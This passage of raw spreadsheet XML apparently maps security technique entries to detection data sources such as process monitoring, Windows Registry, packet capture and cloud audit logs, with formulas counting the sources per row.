      <c r="D151" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E151" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F151" s="53"/>
      <c r="G151" s="19"/>
    </row>
    <row r="152" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A152" s="16" t="s">
        <v>264</v>
      </c>
      <c r="B152" s="53" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C152" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D152" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E152" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F152" s="53"/>
      <c r="G152" s="19"/>
    </row>
    <row r="153" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A153" s="16" t="s">
        <v>265</v>
      </c>
      <c r="B153" s="53" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C153" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D153" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E153" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F153" s="53"/>
      <c r="G153" s="19"/>
    </row>
    <row r="154" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A154" s="16" t="s">
        <v>266</v>
      </c>
      <c r="B154" s="53" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C154" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D154" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E154" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F154" s="53"/>
      <c r="G154" s="19"/>
    </row>
    <row r="155" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A155" s="16" t="s">
        <v>267</v>
      </c>
      <c r="B155" s="53" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C155" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D155" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E155" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F155" s="53"/>
      <c r="G155" s="19"/>
    </row>
    <row r="156" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A156" s="16" t="s">
        <v>268</v>
      </c>
      <c r="B156" s="53" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C156" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D156" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E156" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F156" s="53"/>
      <c r="G156" s="19"/>
    </row>
    <row r="157" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A157" s="16" t="s">
        <v>269</v>
      </c>
      <c r="B157" s="53" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C157" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D157" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E157" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F157" s="53"/>
      <c r="G157" s="19"/>
    </row>
    <row r="158" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A158" s="16" t="s">
        <v>270</v>
      </c>
      <c r="B158" s="53" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C158" s="17">
        <v>100</v>
      </c>
      <c r="D158" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E158" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F158" s="53"/>
      <c r="G158" s="19"/>
    </row>
    <row r="159" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A159" s="16" t="s">
        <v>271</v>
      </c>
      <c r="B159" s="53" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C159" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D159" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E159" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F159" s="53"/>
      <c r="G159" s="19"/>
    </row>
    <row r="160" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A160" s="16" t="s">
        <v>272</v>
      </c>
      <c r="B160" s="53" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C160" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D160" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E160" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F160" s="53"/>
      <c r="G160" s="19"/>
    </row>
    <row r="161" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A161" s="16" t="s">
        <v>273</v>
      </c>
      <c r="B161" s="53" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C161" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D161" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E161" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F161" s="53"/>
      <c r="G161" s="19"/>
    </row>
    <row r="162" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A162" s="16" t="s">
        <v>274</v>
      </c>
      <c r="B162" s="53" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C162" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D162" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E162" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F162" s="53"/>
      <c r="G162" s="19"/>
    </row>
    <row r="163" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A163" s="16" t="s">
        <v>275</v>
      </c>
      <c r="B163" s="53" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C163" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D163" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E163" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F163" s="53"/>
      <c r="G163" s="19"/>
    </row>
    <row r="164" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A164" s="16" t="s">
        <v>276</v>
      </c>
      <c r="B164" s="53" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C164" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D164" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E164" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F164" s="53"/>
      <c r="G164" s="19"/>
    </row>
    <row r="165" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A165" s="16" t="s">
        <v>277</v>
      </c>
      <c r="B165" s="53" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C165" s="17">
        <v>0</v>
      </c>
      <c r="D165" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E165" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F165" s="53"/>
      <c r="G165" s="19"/>
    </row>
    <row r="166" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A166" s="16" t="s">
        <v>278</v>
      </c>
      <c r="B166" s="53" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C166" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D166" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E166" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F166" s="53"/>
      <c r="G166" s="19"/>
    </row>
    <row r="167" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A167" s="16" t="s">
        <v>279</v>
      </c>
      <c r="B167" s="53" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C167" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D167" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E167" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F167" s="53"/>
      <c r="G167" s="19"/>
    </row>
    <row r="168" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A168" s="16" t="s">
        <v>280</v>
      </c>
      <c r="B168" s="53" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C168" s="17">
        <v>100</v>
      </c>
      <c r="D168" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E168" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F168" s="53"/>
      <c r="G168" s="19"/>
    </row>
    <row r="169" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A169" s="16" t="s">
        <v>281</v>
      </c>
      <c r="B169" s="53" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C169" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D169" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E169" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F169" s="53"/>
      <c r="G169" s="19"/>
    </row>
    <row r="170" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A170" s="16" t="s">
        <v>282</v>
      </c>
      <c r="B170" s="53" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C170" s="17">
        <v>100</v>
      </c>
      <c r="D170" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E170" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F170" s="53"/>
      <c r="G170" s="19"/>
    </row>
    <row r="171" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A171" s="16" t="s">
        <v>283</v>
      </c>
      <c r="B171" s="53" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C171" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D171" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E171" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F171" s="53"/>
      <c r="G171" s="19"/>
    </row>
    <row r="172" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A172" s="16" t="s">
        <v>284</v>
      </c>
      <c r="B172" s="53" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C172" s="17" t="s">
        <v>252</v>
      </c>
      <c r="D172" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E172" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F172" s="53"/>
      <c r="G172" s="19"/>
    </row>
    <row r="173" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A173" s="16" t="s">
        <v>285</v>
      </c>
      <c r="B173" s="53" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C173" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D173" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E173" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F173" s="53"/>
      <c r="G173" s="19"/>
    </row>
    <row r="174" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A174" s="16" t="s">
        <v>286</v>
      </c>
      <c r="B174" s="53" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C174" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D174" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E174" s="53">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="F174" s="53"/>
      <c r="G174" s="19"/>
    </row>
    <row r="175" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A175" s="16" t="s">
        <v>287</v>
      </c>
      <c r="B175" s="53" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C175" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D175" s="53">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E175" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F175" s="53"/>
      <c r="G175" s="19"/>
    </row>
    <row r="176" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A176" s="16" t="s">
        <v>288</v>
      </c>
      <c r="B176" s="53" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C176" s="17" t="s">
        <v>289</v>
      </c>
      <c r="D176" s="53">
        <f t="shared" si="5"/>
        <v>8</v>
      </c>
      <c r="E176" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F176" s="53"/>
      <c r="G176" s="19"/>
    </row>
    <row r="177" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A177" s="16" t="s">
        <v>290</v>
      </c>
      <c r="B177" s="53" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C177" s="17" t="s">
        <v>291</v>
      </c>
      <c r="D177" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E177" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F177" s="53"/>
      <c r="G177" s="19"/>
    </row>
    <row r="178" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A178" s="16" t="s">
        <v>292</v>
      </c>
      <c r="B178" s="53" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C178" s="17" t="s">
        <v>293</v>
      </c>
      <c r="D178" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E178" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F178" s="53"/>
      <c r="G178" s="19"/>
    </row>
    <row r="179" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A179" s="16" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="53" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C179" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D179" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E179" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F179" s="53"/>
      <c r="G179" s="19"/>
    </row>
    <row r="180" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A180" s="16" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="53" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C180" s="17" t="s">
        <v>296</v>
      </c>
      <c r="D180" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E180" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F180" s="53"/>
      <c r="G180" s="19"/>
    </row>
    <row r="181" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A181" s="16" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="53" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C181" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D181" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E181" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F181" s="53"/>
      <c r="G181" s="19"/>
    </row>
    <row r="182" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A182" s="16" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="53" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C182" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D182" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E182" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F182" s="53"/>
      <c r="G182" s="19"/>
    </row>
    <row r="183" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A183" s="16" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="53" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C183" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D183" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E183" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F183" s="53"/>
      <c r="G183" s="19"/>
    </row>
    <row r="184" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A184" s="16" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="53" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C184" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D184" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E184" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F184" s="53"/>
      <c r="G184" s="19"/>
    </row>
    <row r="185" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A185" s="16" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="53" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C185" s="17">
        <v>100</v>
      </c>
      <c r="D185" s="53">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E185" s="53">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="F185" s="53"/>
      <c r="G185" s="19"/>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A186" s="16" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="53" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C186" s="17" t="s">
        <v>303</v>
      </c>
      <c r="D186" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E186" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F186" s="53"/>
      <c r="G186" s="19"/>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A187" s="16" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="53" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C187" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D187" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E187" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F187" s="53"/>
      <c r="G187" s="19"/>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A188" s="16" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="53" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C188" s="17" t="s">
        <v>306</v>
      </c>
      <c r="D188" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E188" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F188" s="53"/>
      <c r="G188" s="19"/>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A189" s="16" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="53" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C189" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D189" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E189" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F189" s="53"/>
      <c r="G189" s="19"/>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A190" s="16" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="53" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C190" s="17" t="s">
        <v>309</v>
      </c>
      <c r="D190" s="53">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E190" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F190" s="53"/>
      <c r="G190" s="19"/>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="16" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="53" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C191" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D191" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E191" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F191" s="53"/>
      <c r="G191" s="19"/>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A192" s="16" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="53" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C192" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D192" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E192" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F192" s="53"/>
      <c r="G192" s="19"/>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A193" s="16" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="53" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C193" s="17" t="s">
        <v>314</v>
      </c>
      <c r="D193" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E193" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F193" s="53"/>
      <c r="G193" s="19"/>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A194" s="16" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="53" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C194" s="17" t="s">
        <v>316</v>
      </c>
      <c r="D194" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E194" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F194" s="53"/>
      <c r="G194" s="19"/>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A195" s="16" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="53" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C195" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D195" s="53">
        <f t="shared" ref="D195:D258" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>7</v>
      </c>
      <c r="E195" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F195" s="53"/>
      <c r="G195" s="19"/>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A196" s="16" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="53" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
      <c r="C196" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D196" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E196" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F196" s="53"/>
      <c r="G196" s="19"/>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A197" s="16" t="s">
        <v>319</v>
      </c>
      <c r="B197" s="53" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>Component firmware,BIOS,Disk forensics,EFI</v>
      </c>
      <c r="C197" s="17" t="s">
        <v>320</v>
      </c>
      <c r="D197" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E197" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F197" s="53"/>
      <c r="G197" s="19"/>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="16" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="53" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
      <c r="C198" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D198" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E198" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F198" s="53"/>
      <c r="G198" s="19"/>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="16" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="53" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>320</v>
      </c>
      <c r="D199" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E199" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F199" s="53"/>
      <c r="G199" s="19"/>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="16" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="53" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
      </c>
      <c r="C200" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D200" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E200" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F200" s="53"/>
      <c r="G200" s="19"/>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="16" t="s">
        <v>324</v>
      </c>
